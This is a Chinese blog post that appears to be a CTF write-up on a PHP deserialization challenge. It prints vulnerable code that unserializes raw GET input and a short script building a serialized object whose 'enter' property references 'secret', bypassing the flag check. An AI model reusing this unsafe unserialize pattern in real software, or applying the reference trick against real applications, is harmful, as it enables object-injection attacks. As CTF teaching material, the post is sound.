当前位置: 首页 > news >正文

PHP“引用”漏洞

今日例题:

<?php
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");
class just4fun {
    var $enter;
    var $secret;
}

if (isset($_GET['pass'])) {
    $pass = $_GET['pass'];
    $pass=str_replace('*','\*',$pass);
}

$o = unserialize($pass);

if ($o) {
    $o->secret = "*";
    if ($o->secret === $o->enter)
        echo "Congratulation! Here is my secret: ".$flag;
    else
        echo "Oh no... You can't fool me";
}
else echo "are you trolling?";
?>

这道题目其实很容易,其实就构造序列化字符串使enter=secret,但是secret已经写死了,变成*,我貌似只能给enter赋值*才能满足条件,但是    $pass=str_replace('*','\*',$pass);这里我只要写入*就会被替换成\,所以现在问题变成了怎么在不写入*的情况下让enter=secret,这时就要使用引用漏洞。

引用漏洞:相当于创建了一个快捷方式,可以让你去访问,但是我又不是直接去对原对象赋值。

&$a->secret这里就是一个引用,在前面加个&符号就好

 

据陈腾师傅所说,所以这道题目的关键根本不在于他们是否都是*,而是在于他们相等,只要加个&就好了

代码如下:

<?phpclass just4fun{var $enter='*';var $secret;
}
$a= new just4fun();
$a->enter=&$a->secret;
echo serialize($a);​


希望本文能够帮助大家。

http://www.lryc.cn/news/287612.html

相关文章:

  • 计算机网络-AAA原理概述
  • Oracle BIEE 示例(一)数据透视表2
  • 算法训练营Day50(动态规划11)
  • DS:顺序表的实现(超详细!!)
  • 用flinkcdc debezium来捕获数据库的删除内容
  • mariadb数据库从入门到精通
  • LabVIEW探测器CAN总线系统
  • 侧输出流(Side Output)
  • Vue 动态组件与异步组件:深入理解与全面应用
  • Zephyr 源码调试
  • 数学建模绘图
  • 代码随想录算法训练营第十天 | 239.滑动窗口最大值、347.前K个高频元素
  • 【Godot4自学手册】第五节用GDScript语言让主人公动起来
  • 被问到Tomcat是什么该怎么回答?他还有一个好帮手JDK你知道吗?
  • 【Web前端实操11】定位实操_照片墙(无序摆放)
  • 图像处理------调整色调
  • 【操作系统】实验七 显示进程列表
  • [实战]加密传输数据解密
  • yarn install 报错 证书过期 Certificate has expired
  • 多流转换 (分流,合流,基于时间的合流——双流联结 )
  • Linux破解密码
  • ABAP 批导demo调用SM30表维护demo
  • Mysql 文件导入与导出
  • 《每天十分钟》-红宝书第4版-迭代器与生成器
  • 1、【vue篇】vue框架快速上手
  • Unity 编辑器篇|(九)编辑器美化类( GUIStyle、GUISkin、EditorStyles) (全面总结 | 建议收藏)
  • Spring Boot Starters
  • Qt防止创建窗口抢焦点
  • shared_ptr 与 unique_ptr 的转换 笔记
  • python windows和linux 文件同步